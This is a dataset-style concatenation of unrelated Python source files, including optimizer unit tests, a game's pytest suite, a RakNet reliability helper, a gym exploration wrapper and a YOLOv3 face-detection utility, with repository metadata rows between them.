max_iter=max_iter,
edge_func=edge_func_dist_np,
edge_func_derivative= edge_func_dist_derivative_np,
d=False,
lam=lam)
x = data['x'][-1]
#print(x)
#print(t(x,a,b,c,n,d,lam,max_d,max_tt))
SO = np.sum(x*t(x,a,b,c,n,d,lam,max_d,max_tt))
lam = 1
max_tt = 1
max_d = 1
G, data = tapnx.gradient_projection(
G,
collect_data=True,
aec_gap_tol=tol,
max_iter=max_iter,
edge_func=edge_func_dist_np,
edge_func_derivative= edge_func_dist_derivative_np,
d=True,
lam=lam)
x = data['x'][-1]
print(x)
#print(t(x,a,b,c,n,d,lam,max_d,max_tt))
WEI_SO = np.sum(x*t(x,a,b,c,n,d,lam,max_d,max_tt))
print(SO)
print(WEI_SO)
print(UE)
print(UE/SO)
# get max by maximising total travel time, min -xt(x)
# get max distance by maximising distance, min -dx
# tt_results = []
# d_results = []
# # lam up to 0.9999
# for lam in np.arange(0,1,0.01):
# print(lam)
# G, data = tapnx.gradient_projection(
# G,
# collect_data=True,
# aec_gap_tol=tol,
# max_iter=max_iter,
# edge_func=edge_func_dist_np,
# edge_func_derivative= edge_func_dist_derivative_np,
# d=True,
# lam=lam)
# x = data['x'][-1]
# #print(x)
# #print(t(x,a,b,c,n,d,lam))
# tt_results.append(np.sum(x*t(x,a,b,c,n,d,0)))
# d_results.append(np.sum(x*t(x,a,b,c,n,d,1)))
# print(tt_results)
# print(d_results)
# plt.figure()
# plt.plot(d_results, tt_results, 'o')
# plt.show()
#plt.figure()
#plt.plot(data['AEC'], label='Gradient Projection 1')
#plt.yscale('log')
| 25.78355 | 133 | 0.65413 |
ace0961ffe490c9240b92728ebf2a28e9fb2faed | 8,082 | py | Python | tests/tests.py | KOLANICH-ML/UniOpt.py | 9c87f9e19c4ba3fbeaf611c88d65ffb6d0bfbfae | [
"Unlicense"
] | null | null | null | tests/tests.py | KOLANICH-ML/UniOpt.py | 9c87f9e19c4ba3fbeaf611c88d65ffb6d0bfbfae | [
"Unlicense"
] | 1 | 2021-05-17T06:28:31.000Z | 2021-05-17T06:28:31.000Z | tests/tests.py | KOLANICH-ML/UniOpt.py | 9c87f9e19c4ba3fbeaf611c88d65ffb6d0bfbfae | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python3
import sys
from pathlib import Path
import unittest
thisDir=Path(__file__).parent.absolute()
sys.path.append(str(thisDir.parent))
import numpy as np
from funcs import ackleyRosenbrockWithVariance
from UniOpt.core.Spec import *
from UniOpt.core.SpecNoIntegers import *
from UniOpt.core.SpecNoScalars import *
from UniOpt.core.SpecOnlyBoxes import SpecOnlyBoxes, ArraySpecOnlyBoxesNoIntegers, SpecOnlyBoxesNoIntegers, ArraySpecOnlyBoxes
from UniOpt.core.ArraySpec import *
from UniOpt.core.PointsStorage import *
from UniOpt.core.MetaSpec import MSpec
from UniOpt.backends.ecabc import BeeColonyGridSpec
from UniOpt.backends.pyshac import PySHACGridSpec
import UniOpt
from pprint import pprint
from collections import OrderedDict
import scipy.stats
specsTestGridSpec={
"x": HyperparamDefinition(float, scipy.stats.uniform(loc=0, scale=10)),
"w": HyperparamDefinition(int, scipy.stats.uniform(loc=0, scale=10)),
"y": HyperparamDefinition(float, scipy.stats.norm(loc=0, scale=10)), #discrete
"z": 3
}
masterInitVec=OrderedDict(( ("x", 0.7), ("w", 0.7), ("y", 0.6), ("z" , 3) ))
resultVec=OrderedDict(( ("x", masterInitVec["x"]), ("w", masterInitVec["w"]), ("y", specsTestGridSpec["y"].distribution.ppf(masterInitVec["y"])), ("z", 3) ))
classezToTest=("DummySpecNoScalarsCategoricalNoIntegers", "DummyArraySpecNoScalarsCategorical", "DummyArraySpecToIntegers", "DummyArraySpecNoScalarsDumbToIntegers", "DummyArraySpecNoScalarsCategoricalToIntegers", "DummyArraySpecNoScalarsCategoricalNoIntegers", "DummyArraySpecNoScalarsDumbNoIntegers", "DummyArraySpecNoScalarsDumb", "DummyArraySpecNoIntegers", "DummyArraySpec", "DummySpec", "DummySpecNoIntegers", "DummySpecNoScalarsCategoricalToIntegers")
classezToTest=[MSpec(clsName) for clsName in classezToTest]
classezToTest.extend((SpecOnlyBoxes, ArraySpecOnlyBoxesNoIntegers, SpecOnlyBoxesNoIntegers, ArraySpecOnlyBoxes))
class TestSpecsClasses(unittest.TestCase):
    """Checks that every generated spec class composes the expected mixin hierarchy."""
    def assertIsSubclass(self, cls, superCls, msg=None):
        # Custom assertion: unittest has assertIsInstance but no subclass variant.
        if not issubclass(cls, superCls):
            self.fail(self._formatMessage(msg, repr(cls)+' is not a subclass of '+repr(superCls)))
    def assertForBasicClass(self, cls, basicCls):
        # If cls mixes in basicCls, its companion vector/spec types must mix in
        # the corresponding companion types of basicCls.
        if issubclass(cls, basicCls):
            self.assertIsSubclass(cls.hyperparamsVectorType, basicCls.hyperparamsVectorType)
            self.assertIsSubclass(cls.hyperparamsSpecType, basicCls.hyperparamsSpecType)
    def assertions4ASpecClass(self, cls):
        # Verify the invariant against every basic mixin the class may include.
        basicClasses=(
            SpecNoIntegers,
            SpecToIntegers,
            SpecNoScalarsDumb,
            SpecNoScalarsCategorical,
            ArraySpec
        )
        for basicCls in basicClasses:
            self.assertForBasicClass(cls, basicCls)
    def testSpecsClasses(self):
        for cls in classezToTest:
            with self.subTest(specClass=cls):
                #print(cls, [scls.__name__ for scls in cls.mro()])
                #print(cls.hyperparamsVectorType, [scls.__name__ for scls in cls.hyperparamsVectorType.mro()[:-1]])
                #print(cls.hyperparamsSpecType, [scls.__name__ for scls in cls.hyperparamsSpecType.mro()[:-1]])
                self.assertions4ASpecClass(cls)
    def testSpecsInheritedClasses(self):
        # Subclassing a spec class must preserve the hierarchy invariants.
        for cls in classezToTest:
            with self.subTest(specClass=cls):
                class InheritedClass(cls):
                    pass
                self.assertions4ASpecClass(cls)
class TestSpecs(unittest.TestCase):
    """Checks that spec classes transform raw hyperparameter vectors correctly."""
    def assertionsOnHyperparamsVector(self, cls, b):
        # `b` is the transformed vector; values must match `resultVec` with the
        # integer/float handling dictated by the mixins `cls` includes.
        self.assertEqual(b["x"], resultVec["x"])
        self.assertIsInstance(b["x"], float)
        if issubclass(cls, SpecNoIntegers):
            self.assertEqual(b["w"], float2int(resultVec["w"]))
            self.assertIsInstance(b["w"], int)
        elif issubclass(cls, SpecToIntegers):
            self.assertEqual(b["w"], int(resultVec["w"]))
            self.assertIsInstance(b["w"], int)
        else:
            self.assertEqual(b["w"], resultVec["w"])
            self.assertIsInstance(b["w"], float)
        self.assertEqual(b["y"], resultVec["y"])
        self.assertIsInstance(b["y"], float)
        self.assertEqual(b["z"], resultVec["z"])
        self.assertIsInstance(b["z"], int)
    def generateTestHPVec(self, cls):
        # Build the raw vector an optimizer of class `cls` would hand back.
        hpInitVec=type(masterInitVec)(masterInitVec)
        if issubclass(cls, DummySpec) or hasattr(cls, "HyperparamsSpecsConverters") and hasattr(cls.HyperparamsSpecsConverters, specsTestGridSpec["y"].distribution.dist.name):
            hpInitVec["y"] = resultVec["y"] #the result is generated by the optimizer itself
        if issubclass(cls, SpecNoScalarsDumb):
            del(hpInitVec["z"])
        else:
            # optimizer may transform a categorical int into float !!! DO NOT DELETE!
            if issubclass(cls, SpecToIntegersBase):
                hpInitVec["z"] = float(hpInitVec["z"]) # to test if conversion to int works
        if issubclass(cls.hyperparamsVectorType, HyperparamArray):
            hpInitVec = list(hpInitVec.values())
        else:
            hpInitVec = dict(hpInitVec)
        return hpInitVec
    def genericSpecTest(self, cls):
        # Instantiate the spec, transform the raw vector, assert on the result.
        hpInitVec=self.generateTestHPVec(cls)
        a = cls(specsTestGridSpec)
        b = a.transformHyperparams(hpInitVec)
        self.assertionsOnHyperparamsVector(cls, b)
        return a, b
    def testGenericSpecs(self):
        for cls in classezToTest:
            with self.subTest(specClass=cls):
                self.genericSpecTest(cls)
    def testBeeColonyGridSpec(self):
        # ecabc backend stores its spec as ["type", (low, high)] pairs.
        a=BeeColonyGridSpec(specsTestGridSpec)
        b=a.transformHyperparams(self.generateTestHPVec(BeeColonyGridSpec))
        self.assertEqual(b["x"], resultVec["x"])
        self.assertEqual(b["y"], resultVec["y"])
        self.assertEqual(b["z"], resultVec["z"])
        self.assertEqual(a.spec["x"], ["float", (0, 10)])
        self.assertEqual(a.spec["y"], ["float", uniformLimits])
        self.assertEqual(a.spec["w"], ['int', (0.0, 10.0)])
    def testPySHACSpecGridSpec(self):
        # pyshac backend maps each hyperparam to its own HyperParameter class.
        import pyshac
        a, b=self.genericSpecTest(PySHACGridSpec)
        self.assertIsInstance(a.spec["x"], pyshac.config.hyperparameters.UniformContinuousHyperParameter)
        self.assertIsInstance(a.spec["y"], pyshac.config.hyperparameters.NormalContinuousHyperParameter)
        self.assertIsInstance(a.spec["w"], pyshac.config.hyperparameters.UniformContinuousHyperParameter)
        self.assertIsInstance(a.spec["z"], pyshac.config.hyperparameters.DiscreteHyperParameter)
        #self.assertionsOnHyperparamsVector()
optimizerTestGridSpec={
"x": HyperparamDefinition(float, scipy.stats.uniform(loc=0, scale=10)),
"y": HyperparamDefinition(int, scipy.stats.norm(loc=0, scale=10)), #discrete
#"y": HyperparamDefinition(int, scipy.stats.uniform(loc=0, scale=10)), #discrete
"z":3
}
from random import randint
testStoredPointsToTestInjection = [(p, ackleyRosenbrockWithVariance(p)) for p in ({"x":pp/5.,"y": randint(-30, 30)/3,"z":3} for pp in range(50))]
def prepareTestStor(cls):
    """Instantiate a storage of class `cls` pre-populated with the shared test points."""
    storage = cls()
    for point, loss in testStoredPointsToTestInjection:
        storage.append(point, loss)
    return storage
class OptimizersTests(unittest.TestCase):
    """Runs every registered optimizer on the Ackley-Rosenbrock objective."""
    def assertOnParams(self, params):
        # Every candidate handed to the objective must respect the grid spec:
        # types, the [0, 10] range for x, and the fixed categorical z.
        self.assertIsInstance(params["x"], possibleTypesRemap[optimizerTestGridSpec["x"].type])
        self.assertGreaterEqual(params["x"], 0.)
        self.assertLessEqual(params["x"], 10.)
        self.assertIsInstance(params["y"], possibleTypesRemap[optimizerTestGridSpec["y"].type])
        self.assertIsInstance(params["z"], possibleTypesRemap[type(optimizerTestGridSpec["z"])])
        self.assertEqual(params["z"], optimizerTestGridSpec["z"])
    def ackleyRosenbrockWithVarianceAndAssert(self, params):
        # Objective wrapper that validates the candidate before evaluating it.
        self.assertOnParams(params)
        return ackleyRosenbrockWithVariance(params)
    #@unittest.skip
    def testOptimizers(self):
        func=self.ackleyRosenbrockWithVarianceAndAssert
        results={}
        for optimizer in UniOpt:
        #for optimizer in (UniOpt.BayTuneGP, UniOpt.PySOT, UniOpt.RoBOGP):
            print("optimizer: "+optimizer.__name__)
            with self.subTest(optimizer=optimizer):
                opt=optimizer(func, optimizerTestGridSpec, iters=100, jobs=1, pointsStorage=prepareTestStor(MemoryStorage))
                res=opt()
                results[optimizer]=(res, func(res))
        # Rank optimizers by the loss of their best point.
        results=OrderedDict(((k.__name__, v) for k,v in sorted(results.items(), key=lambda x: x[1][1][0])))
        #if sys.version_info >= (3, 5):
        #    results=dict(results)
        pprint(results)
    @unittest.skip
    def testOptimizer(self):
        # Single-backend variant for debugging one optimizer in isolation.
        func=self.ackleyRosenbrockWithVarianceAndAssert
        opt=UniOpt.GPyOpt(func, optimizerTestGridSpec, iters=100, jobs=1, pointsStorage=prepareTestStor(MemoryStorage))
        res=opt()
        self.assertOnParams(res)
if __name__ == '__main__':
unittest.main() | 39.043478 | 457 | 0.756372 |
ace0964626f010ec43f44cd74cf3018dd2f8fbd0 | 3,589 | py | Python | tests/func/strike_model_func_test.py | efomc/Tournament_game-russian_version | 7f2f8add907481c0e74b3a44f55a143234df8a83 | [
"MIT"
] | null | null | null | tests/func/strike_model_func_test.py | efomc/Tournament_game-russian_version | 7f2f8add907481c0e74b3a44f55a143234df8a83 | [
"MIT"
] | null | null | null | tests/func/strike_model_func_test.py | efomc/Tournament_game-russian_version | 7f2f8add907481c0e74b3a44f55a143234df8a83 | [
"MIT"
] | null | null | null | import pytest
from tournament_game import (
Character,
strike_model,
)
def test_strike_model_common():
    """After several strikes, at least one fighter must have taken damage.

    Fix: the second disjunct compared ``fighter2.armor_curr`` against
    ``fighter1.armor`` (an obvious copy-paste typo); each fighter's current
    armor must be compared with that same fighter's starting armor.
    """
    fighter1 = Character("first")
    fighter1.armor_curr = fighter1.armor
    fighter2 = Character("second")
    fighter2.armor_curr = fighter2.armor
    for strike in range(1, 10):
        strike_model(fighter1, fighter2, strike)
    assert (
        fighter1.armor_curr != fighter1.armor or fighter2.armor_curr != fighter2.armor
    )
@pytest.mark.parametrize(
    "numbers_of_fights, limit_of_strikes",
    [
        (10000, 150),
    ],
)
def test_strike_model_long(numbers_of_fights, limit_of_strikes):
    # Statistical guard: across many simulated duels, no single fight may
    # exceed `limit_of_strikes` strikes before a fighter's armor reaches 0.
    for fight in range(numbers_of_fights):
        fighter1 = Character("first")
        fighter1.armor_curr = fighter1.armor
        fighter2 = Character("second")
        fighter2.armor_curr = fighter2.armor
        strike_number = 0
        while fighter1.armor_curr > 0 and fighter2.armor_curr > 0:
            strike_number += 1
            strike_model(fighter1, fighter2, strike_number)
        assert strike_number <= limit_of_strikes
@pytest.mark.parametrize(
    "numbers_of_fights, limit_of_strikes, percent_limit_strikes",
    [
        (10000, 10, 0.8),
    ],
)
def test_strike_model_percent_long(
    numbers_of_fights, limit_of_strikes, percent_limit_strikes
):
    # At least `percent_limit_strikes` (a fraction) of all fights must finish
    # within `limit_of_strikes` strikes.
    numbers_of_good_long = 0
    for fight in range(numbers_of_fights):
        fighter1 = Character("first")
        fighter1.armor_curr = fighter1.armor
        fighter2 = Character("second")
        fighter2.armor_curr = fighter2.armor
        strike_number = 0
        while fighter1.armor_curr > 0 and fighter2.armor_curr > 0:
            strike_number += 1
            strike_model(fighter1, fighter2, strike_number)
        if strike_number <= limit_of_strikes:
            numbers_of_good_long += 1
    assert numbers_of_good_long / numbers_of_fights >= percent_limit_strikes
@pytest.mark.parametrize(
    "numbers_of_fights",
    [
        50,
    ],
)
def test_strike_model_print_strike_description(numbers_of_fights, capfd, monkeypatch):
    # Run many first strikes and record which of the known fight messages
    # appeared on stdout; every message must be seen at least once.
    result_dict = {
        "Цели достиг удар бойца first": False,
        "Цели достиг удар бойца second": False,
        "Они целуются! Но вот бьют снова!": False,
        "Удар парирован!": False,
        "Оба промахнулись. Бьют снова!": False,
    }
    expected_result_dict = {
        "Цели достиг удар бойца first": True,
        "Цели достиг удар бойца second": True,
        "Они целуются! Но вот бьют снова!": True,
        "Удар парирован!": True,
        "Оба промахнулись. Бьют снова!": True,
    }
    for fight in range(numbers_of_fights):
        fighter1 = Character("first")
        fighter1.armor_curr = fighter1.armor
        fighter2 = Character("second")
        fighter2.armor_curr = fighter2.armor
        strike_model(fighter1, fighter2, strike_number=1)
        out = capfd.readouterr()[0]
        for key in result_dict:
            if key in out:
                result_dict[key] = True
    # The "kiss" outcome is rare; if it never occurred naturally, force it by
    # patching hit_model to always return "kiss" and run one more strike.
    if not result_dict["Они целуются! Но вот бьют снова!"]:
        monkeypatch.setattr(
            "tournament_game.fight.hit_model", (lambda fighter1, fighter2, dice: "kiss")
        )
        fighter1 = Character("first")
        fighter2 = Character("second")
        strike_model(fighter1, fighter2, 1)
        out = capfd.readouterr()[0]
        if "Они целуются! Но вот бьют снова!" in out:
            result_dict["Они целуются! Но вот бьют снова!"] = True
    assert result_dict == expected_result_dict
| 33.858491 | 89 | 0.63221 |
ace09782112a4a9e5d0912827e5c3d9a8f1f66d7 | 614 | py | Python | tests/pyfilter/operations/conftest.py | Hengle/Houdini-Toolbox | a1fd7d3dd73d3fc4cea78e29aeff1d190c41bae3 | [
"MIT"
] | 136 | 2015-01-03T04:03:23.000Z | 2022-02-07T11:08:57.000Z | tests/pyfilter/operations/conftest.py | Hengle/Houdini-Toolbox | a1fd7d3dd73d3fc4cea78e29aeff1d190c41bae3 | [
"MIT"
] | 11 | 2017-02-09T20:05:04.000Z | 2021-01-24T22:25:59.000Z | tests/pyfilter/operations/conftest.py | Hengle/Houdini-Toolbox | a1fd7d3dd73d3fc4cea78e29aeff1d190c41bae3 | [
"MIT"
] | 26 | 2015-08-18T12:11:02.000Z | 2020-12-19T01:53:31.000Z | """Test setup."""
# =============================================================================
# IMPORTS
# =============================================================================
# Third Party
import pytest
# =============================================================================
# FIXTURES
# =============================================================================
@pytest.fixture
def patch_operation_logger(mocker):
    """Mock the log_filter_call logger."""
    # Replace the module-level logger so tests can assert on logging calls
    # without emitting real log output.
    mock_logger = mocker.patch(
        "ht.pyfilter.operations.operation._logger", autospec=True
    )
    yield mock_logger
| 26.695652 | 79 | 0.332248 |
ace0979d371ca9f896fb52d23f56afaeb1bdbbc7 | 2,973 | py | Python | rak_net/utils/reliability_tool.py | MCPI-Revival/big_test | aba8d4aa5aae2789a777c0c0d42374f3ee24eae3 | [
"MIT"
] | null | null | null | rak_net/utils/reliability_tool.py | MCPI-Revival/big_test | aba8d4aa5aae2789a777c0c0d42374f3ee24eae3 | [
"MIT"
] | null | null | null | rak_net/utils/reliability_tool.py | MCPI-Revival/big_test | aba8d4aa5aae2789a777c0c0d42374f3ee24eae3 | [
"MIT"
] | null | null | null | ################################################################################
# #
# ____ _ #
# | _ \ ___ __| |_ __ _ _ _ __ ___ #
# | |_) / _ \ / _` | '__| | | | '_ ` _ \ #
# | __/ (_) | (_| | | | |_| | | | | | | #
# |_| \___/ \__,_|_| \__,_|_| |_| |_| #
# #
# Copyright 2021 Podrum Studios #
# #
# Permission is hereby granted, free of charge, to any person #
# obtaining a copy of this software and associated documentation #
# files (the "Software"), to deal in the Software without restriction, #
# including without limitation the rights to use, copy, modify, merge, #
# publish, distribute, sublicense, and/or sell copies of the Software, #
# and to permit persons to whom the Software is furnished to do so, #
# subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included #
# in all copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING #
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS #
# IN THE SOFTWARE. #
# #
################################################################################
class reliability_tool:
    """Predicates classifying RakNet packet reliability ids (0-7).

    Fix: replaced the ``if cond: return True / return False`` anti-pattern
    with direct boolean returns; behavior is unchanged.
    """

    @staticmethod
    def reliable(reliability: int) -> bool:
        # Reliable ids are 2, 3, 4, 6 and 7 (5 is excluded).
        return 2 <= reliability <= 7 and reliability != 5

    @staticmethod
    def sequenced(reliability: int) -> bool:
        # Sequenced ids are 1 and 4.
        return reliability == 1 or reliability == 4

    @staticmethod
    def ordered(reliability: int) -> bool:
        # Ordered ids are 1, 3, 4 and 7 (parentheses make the original
        # and/or precedence explicit).
        return (1 <= reliability <= 4 and reliability != 2) or reliability == 7
| 59.46 | 80 | 0.40666 |
ace0994a61a746c78ade777dcab559dec1586d42 | 458 | py | Python | collections_counter.py | praveen-kumar/hackerrank_practice | daee2ced8424fa9c94dc8cb2d8e1bda4a4f80501 | [
"MIT"
] | null | null | null | collections_counter.py | praveen-kumar/hackerrank_practice | daee2ced8424fa9c94dc8cb2d8e1bda4a4f80501 | [
"MIT"
] | null | null | null | collections_counter.py | praveen-kumar/hackerrank_practice | daee2ced8424fa9c94dc8cb2d8e1bda4a4f80501 | [
"MIT"
] | null | null | null | from collections import Counter
# Input format:
#   line 1: number of shoe pairs in the shop
#   line 2: sizes of all shoes in stock
#   line 3: number of customers
#   then, per customer: desired size and offered price
x = int(input())  # stock count (not needed once sizes are counted)
n = Counter(map(int, input().split()))  # remaining stock per shoe size
n_c = int(input())
income = 0
for _ in range(n_c):
    size, price = map(int, input().split())
    if n[size]:
        # Size in stock: take the money and decrement the stock.
        income += price
        n[size] -= 1
print(income)
def income_count(num_shoes, shoe_sizes, num_cust):
    # TODO: unimplemented stub — presumably intended to wrap the script logic
    # above into a reusable function; note the signature has no purchase data,
    # so confirm the intended inputs before implementing.
    pass
| 18.32 | 50 | 0.644105 |
ace09a5862dfe83720f437007186785230b3b138 | 3,789 | py | Python | humanrl/exploration.py | DFrolova/human-rl | c54ec02a48aba53a6e90d64570ebb7f62dfdea8e | [
"MIT"
] | 31 | 2017-07-18T17:09:34.000Z | 2022-02-16T05:35:45.000Z | humanrl/exploration.py | DFrolova/human-rl | c54ec02a48aba53a6e90d64570ebb7f62dfdea8e | [
"MIT"
] | null | null | null | humanrl/exploration.py | DFrolova/human-rl | c54ec02a48aba53a6e90d64570ebb7f62dfdea8e | [
"MIT"
] | 12 | 2017-07-19T00:14:13.000Z | 2022-03-05T00:49:00.000Z | """
isort:skip_file
"""
import gym
import numpy as np
from scipy import stats
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
def gaussian_kernel(size, std=1.):
    """Return a normalized (1+2*size) x (1+2*size) isotropic Gaussian kernel.

    Args:
        size: kernel radius; the kernel is square with side 1 + 2*size.
        std: standard deviation of the Gaussian.

    Returns:
        2-D numpy array whose entries sum to 1.
    """
    size2 = 1 + 2 * size
    kernel = np.zeros((size2, size2))
    den = 2. * std * std
    for row in range(size2):
        for col in range(size2):
            x = row - size
            # BUG FIX: was `y = row - size`, which made every row of the
            # kernel constant (asymmetric kernel). The second offset must
            # come from the column index.
            y = col - size
            kernel[row, col] = np.exp(-(x*x + y*y) / den)
    kernel /= kernel.sum()
    return kernel
# TODO: check out of bounds
def extract_patch(src, pos, size):
    """Return the (2*size+1)-square sub-array of `src` centred at `pos` (row, col)."""
    row, col = pos
    rows = slice(row - size, row + size + 1)
    cols = slice(col - size, col + size + 1)
    return src[rows, cols]
class ExplorationWrapper(gym.Wrapper):
    # Gym wrapper adding a count-based exploration bonus to the reward.
    # assumes env provides location data
    def __init__(self, env, explore_buffer=1e4, bandwidth=3, decay=False, explore_scale=1.0, gamma=0.99, **unused):
        super(ExplorationWrapper, self).__init__(env)
        # Scale applied to the visit-probability bonus added to the reward.
        self.explore_scale = explore_scale
        print(explore_scale)
        # Pseudo-count budget: counts are initialised so they sum to `total`.
        self.total = int(explore_buffer)
        self.bandwidth = bandwidth
        self.kde = None
        self.locations = []
        # Padding radius so the smoothing kernel never reads out of bounds.
        self.breadth = int(bandwidth)
        self.kernel = gaussian_kernel(self.breadth, bandwidth)
        # 210x160 matches the Atari frame size — TODO confirm for other envs.
        rows = 210 + 2 * self.breadth
        cols = 160 + 2 * self.breadth
        # Uniform prior: every cell starts with the same pseudo-count.
        self.counts = np.full((rows, cols), self.total / (rows * cols))
        self.logprob = -np.log(self.counts.size)
        if decay:
            # Exponential forgetting keeps the total count roughly constant.
            self.decay = 1. - 1. / self.total
        else:
            self.decay = None
        self.gamma = gamma
    def _step(self, action):
        obs, reward, done, info = self.env.step(action)
        location = info.get('location')
        if location is not None:
            """
            self.locations.append(location)
            if len(self.locations) == self.buffer_size:
                # rebuild the kde
                self.kde = stats.gaussian_kde(np.array(self.locations).T, self.bandwidth)
                # plot it?
                dims = obs.shape[:2]
                grid = np.indices(dims)
                kde = self.kde.logpdf(grid.reshape([2, -1]))
                kde = kde.reshape(dims)
                info['kde'] = kde
                #plt.imsave('test.png', kde)
                # drop the older locations
                self.locations = self.locations[self.buffer_size//2:]
            #plt.imsave('counts.png', self.counts)
            #info['logprob'] = logprob
            if self.kde:
                logpdf = self.kde.logpdf(np.array(location))
                info['logpdf'] = logpdf
                reward -= logpdf
            """
            location = location + self.breadth # padding
            index = tuple(location.tolist())
            # Kernel-smoothed visit count around the agent's location.
            patch = extract_patch(self.counts, index, self.breadth)
            count = (self.kernel * patch).sum()
            info['log/visits'] = count
            logprob = np.log(count / self.total)
            info['log/visit_logprob'] = logprob
            #reward = 0
            # Bonus is the drop in log visit probability since the last step.
            bonus = self.explore_scale * (self.logprob - logprob)
            info['log/explore_bonus'] = np.abs(bonus)
            reward += bonus
            self.logprob = logprob
            if self.decay:
                self.counts *= self.decay
            else:
                self.total += 1
            self.counts[index] += 1
        return obs, reward, done, info
if __name__ == "__main__":
    # Smoke test: run a random policy on Montezuma's Revenge with the
    # location + exploration wrappers and render indefinitely.
    from location_wrapper import LocationWrapper
    env = gym.make("MontezumaRevengeDeterministic-v3")
    env = LocationWrapper(env)
    env = ExplorationWrapper(env)
    while True:
        action = env.action_space.sample()
        obs, reward, done, info = env.step(action)
        env.render()
        if done:
            env.reset()
ace09ab0522701559c67ae483785af313202cef9 | 12,971 | py | Python | components/face_detect/yolo_v3_face.py | JamesFengi/handPose_Eric | 3e329181930ebc7ef0fed2abb9a9d092a8541f9c | [
"Apache-2.0"
] | null | null | null | components/face_detect/yolo_v3_face.py | JamesFengi/handPose_Eric | 3e329181930ebc7ef0fed2abb9a9d092a8541f9c | [
"Apache-2.0"
] | null | null | null | components/face_detect/yolo_v3_face.py | JamesFengi/handPose_Eric | 3e329181930ebc7ef0fed2abb9a9d092a8541f9c | [
"Apache-2.0"
] | null | null | null | #-*-coding:utf-8-*-
# date:2021-04-16
# Author: Eric.Lee
# function: yolo v3 face detect
import os
import cv2
import numpy as np
import time
import torch
from face_detect.yolov3 import Yolov3, Yolov3Tiny
from face_detect.utils.torch_utils import select_device
from face_detect.acc_model import acc_model
import torch.backends.cudnn as cudnn
import torch.nn.functional as F
import random
def show_model_param(model):
    """Print the shape and parameter count of each tensor in *model*, then the total."""
    total = 0
    for tensor in model.parameters():
        count = 1
        for dim in tensor.size():
            count *= dim
        print("该层的结构: {}, 参数和: {}".format(str(list(tensor.size())), str(count)))
        total += count
    print("----------------------")
    print("总参数数量和: " + str(total))
def process_data(img, img_size=416):
    """Letterbox *img* to `img_size` and return a normalized CHW float32 array."""
    img, _, _, _ = letterbox(img, height=img_size)
    # BGR -> RGB and HWC -> CHW in one pass.
    chw = img[:, :, ::-1].transpose(2, 0, 1)
    chw = np.ascontiguousarray(chw, dtype=np.float32)
    # Scale pixel values from 0-255 into 0.0-1.0.
    return chw / 255.0
def plot_one_box(x, img, color=None, label=None, line_thickness=None):
    """Draw one bounding box (and optional label) on *img* in place.

    x : box corners (x1, y1, x2, y2); color defaults to a random BGR triple.
    """
    tl = line_thickness or round(0.002 * max(img.shape[0:2])) + 1  # line thickness scaled to image size
    color = color or [random.randint(0, 255) for _ in range(3)]
    c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))
    cv2.rectangle(img, c1, c2, color, thickness=tl)
    if label:
        tf = max(tl - 1, 1)  # font thickness
        t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
        # Filled background rectangle sized to the label text, above the box.
        c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
        cv2.rectangle(img, c1, c2, color, -1)  # filled
        cv2.putText(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [255, 55,90], thickness=tf, lineType=cv2.LINE_AA)
def bbox_iou(box1, box2, x1y1x2y2=True):
    """IoU of a single box `box1` (length 4) against every box in `box2` (n x 4)."""
    box2 = box2.t()  # -> 4 x n, so each coordinate becomes a row
    if x1y1x2y2:
        # Boxes already given as corner coordinates.
        a_x1, a_y1, a_x2, a_y2 = box1[0], box1[1], box1[2], box1[3]
        b_x1, b_y1, b_x2, b_y2 = box2[0], box2[1], box2[2], box2[3]
    else:
        # Boxes given as (center x, center y, width, height): convert to corners.
        a_x1, a_x2 = box1[0] - box1[2] / 2, box1[0] + box1[2] / 2
        a_y1, a_y2 = box1[1] - box1[3] / 2, box1[1] + box1[3] / 2
        b_x1, b_x2 = box2[0] - box2[2] / 2, box2[0] + box2[2] / 2
        b_y1, b_y2 = box2[1] - box2[3] / 2, box2[1] + box2[3] / 2
    # Intersection rectangle (clamped to zero when boxes do not overlap).
    inter_w = (torch.min(a_x2, b_x2) - torch.max(a_x1, b_x1)).clamp(0)
    inter_h = (torch.min(a_y2, b_y2) - torch.max(a_y1, b_y1)).clamp(0)
    inter_area = inter_w * inter_h
    # Union = sum of areas minus intersection (epsilon avoids division by zero).
    area_a = (a_x2 - a_x1) * (a_y2 - a_y1)
    area_b = (b_x2 - b_x1) * (b_y2 - b_y1)
    union_area = area_a + 1e-16 + area_b - inter_area
    return inter_area / union_area
def xywh2xyxy(x):
    """Convert boxes from [center x, center y, w, h] to [x1, y1, x2, y2]."""
    out = torch.zeros_like(x) if isinstance(x, torch.Tensor) else np.zeros_like(x)
    half_w = x[:, 2] / 2
    half_h = x[:, 3] / 2
    out[:, 0] = x[:, 0] - half_w
    out[:, 1] = x[:, 1] - half_h
    out[:, 2] = x[:, 0] + half_w
    out[:, 3] = x[:, 1] + half_h
    return out
def scale_coords(img_size, coords, img0_shape):
    """Map box coordinates (in place) from the letterboxed `img_size` square
    back to the original image of shape `img0_shape` (height, width, ...)."""
    gain = float(img_size) / max(img0_shape)  # scale factor: letterboxed / original
    pad_x = (img_size - img0_shape[1] * gain) / 2  # horizontal letterbox padding
    pad_y = (img_size - img0_shape[0] * gain) / 2  # vertical letterbox padding
    # Remove the padding, then undo the resize.
    coords[:, [0, 2]] -= pad_x
    coords[:, [1, 3]] -= pad_y
    coords[:, :4] /= gain
    # Clip to non-negative pixel coordinates.
    coords[:, :4] = torch.clamp(coords[:, :4], min=0)
    return coords
def non_max_suppression(prediction, conf_thres=0.5, nms_thres=0.4):
    """
    Removes detections with object confidence below 'conf_thres', then applies
